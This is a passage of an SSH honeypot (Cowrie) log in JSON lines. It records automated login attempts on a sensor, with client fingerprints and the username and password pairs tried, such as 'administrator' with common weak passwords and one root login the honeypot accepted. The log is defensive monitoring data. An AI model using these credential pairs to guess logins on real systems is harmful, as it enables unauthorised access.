{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:24:28.843215Z","src_ip":"196.251.115.108","session":"9643be49e244"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"12345","message":"login attempt [administrator/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:24:29.902034Z","src_ip":"196.251.115.108","session":"9643be49e244"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:32.098004Z","src_ip":"196.251.115.108","session":"9643be49e244"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:32.746866Z","src_ip":"120.79.98.154","session":"4f575f452562"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":41478,"dst_ip":"1.2.3.4","dst_port":22,"session":"e26936511a28","protocol":"ssh","message":"New connection: 196.251.115.108:41478 (1.2.3.4:22) [session: e26936511a28]","sensor":"my-vps","timestamp":"2025-08-24T23:25:19.909114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:25:20.659853Z","src_ip":"196.251.115.108","session":"e26936511a28"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:25:20.660849Z","src_ip":"196.251.115.108","session":"e26936511a28"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"12345678","message":"login attempt [administrator/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:25:23.946345Z","src_ip":"196.251.115.108","session":"e26936511a28"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:25:25.217105Z","src_ip":"196.251.115.108","session":"e26936511a28"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":48458,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6def79286e6","protocol":"ssh","message":"New connection: 45.88.8.215:48458 (1.2.3.4:22) [session: b6def79286e6]","sensor":"my-vps","timestamp":"2025-08-24T23:25:45.963288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:25:46.384979Z","src_ip":"45.88.8.215","session":"b6def79286e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T23:25:46.386011Z","src_ip":"45.88.8.215","session":"b6def79286e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Bipin@123","message":"login attempt [root/Bipin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:25:47.760134Z","src_ip":"45.88.8.215","session":"b6def79286e6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:25:48.172768Z","src_ip":"45.88.8.215","session":"b6def79286e6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":45154,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cb502c70628","protocol":"ssh","message":"New connection: 196.251.115.108:45154 (1.2.3.4:22) [session: 2cb502c70628]","sensor":"my-vps","timestamp":"2025-08-24T23:26:10.343131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:26:10.686422Z","src_ip":"196.251.115.108","session":"2cb502c70628"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:26:10.687345Z","src_ip":"196.251.115.108","session":"2cb502c70628"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"qwerty","message":"login attempt [administrator/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:26:12.988809Z","src_ip":"196.251.115.108","session":"2cb502c70628"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:26:14.008654Z","src_ip":"196.251.115.108","session":"2cb502c70628"}
{"eventid":"cowrie.session.closed","duration":"300.9","message":"Connection lost after 300.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:26:38.377050Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":50968,"dst_ip":"1.2.3.4","dst_port":22,"session":"60fa219a9ab8","protocol":"ssh","message":"New connection: 196.251.115.108:50968 (1.2.3.4:22) [session: 60fa219a9ab8]","sensor":"my-vps","timestamp":"2025-08-24T23:26:58.051206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:26:58.373727Z","src_ip":"196.251.115.108","session":"60fa219a9ab8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:26:58.374411Z","src_ip":"196.251.115.108","session":"60fa219a9ab8"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123123","message":"login attempt [administrator/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:27:01.835318Z","src_ip":"196.251.115.108","session":"60fa219a9ab8"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:27:02.946784Z","src_ip":"196.251.115.108","session":"60fa219a9ab8"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":57102,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a60bad721f2","protocol":"ssh","message":"New connection: 196.251.115.108:57102 (1.2.3.4:22) [session: 5a60bad721f2]","sensor":"my-vps","timestamp":"2025-08-24T23:27:45.702197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:27:46.292831Z","src_ip":"196.251.115.108","session":"5a60bad721f2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:27:46.293528Z","src_ip":"196.251.115.108","session":"5a60bad721f2"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"111111","message":"login attempt [administrator/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:27:49.755257Z","src_ip":"196.251.115.108","session":"5a60bad721f2"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:27:50.858447Z","src_ip":"196.251.115.108","session":"5a60bad721f2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36032,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d3a8c37c6a4","protocol":"ssh","message":"New connection: 196.251.115.108:36032 (1.2.3.4:22) [session: 1d3a8c37c6a4]","sensor":"my-vps","timestamp":"2025-08-24T23:28:34.505445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:28:34.817018Z","src_ip":"196.251.115.108","session":"1d3a8c37c6a4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:28:34.817799Z","src_ip":"196.251.115.108","session":"1d3a8c37c6a4"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1234567","message":"login attempt [administrator/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:28:37.778164Z","src_ip":"196.251.115.108","session":"1d3a8c37c6a4"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:28:39.494428Z","src_ip":"196.251.115.108","session":"1d3a8c37c6a4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":41034,"dst_ip":"1.2.3.4","dst_port":22,"session":"b063d9423fd7","protocol":"ssh","message":"New connection: 196.251.115.108:41034 (1.2.3.4:22) [session: b063d9423fd7]","sensor":"my-vps","timestamp":"2025-08-24T23:29:21.716375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:29:22.029220Z","src_ip":"196.251.115.108","session":"b063d9423fd7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:29:22.030849Z","src_ip":"196.251.115.108","session":"b063d9423fd7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:29:25.297171Z","src_ip":"196.251.115.108","session":"b063d9423fd7"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:29:26.384825Z","src_ip":"196.251.115.108","session":"b063d9423fd7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55768,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eaf56e8c134","protocol":"ssh","message":"New connection: 217.72.205.35:55768 (1.2.3.4:22) [session: 5eaf56e8c134]","sensor":"my-vps","timestamp":"2025-08-24T23:29:31.755890Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:29:31.757427Z","src_ip":"217.72.205.35","session":"5eaf56e8c134"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":46370,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1d38f379992","protocol":"ssh","message":"New connection: 196.251.115.108:46370 (1.2.3.4:22) [session: a1d38f379992]","sensor":"my-vps","timestamp":"2025-08-24T23:30:09.491667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:30:09.862389Z","src_ip":"196.251.115.108","session":"a1d38f379992"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:30:09.863275Z","src_ip":"196.251.115.108","session":"a1d38f379992"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:30:13.128327Z","src_ip":"196.251.115.108","session":"a1d38f379992"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:30:14.287345Z","src_ip":"196.251.115.108","session":"a1d38f379992"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":51310,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae0a1858edb1","protocol":"ssh","message":"New connection: 196.251.115.108:51310 (1.2.3.4:22) [session: ae0a1858edb1]","sensor":"my-vps","timestamp":"2025-08-24T23:30:57.877500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:30:58.234202Z","src_ip":"196.251.115.108","session":"ae0a1858edb1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 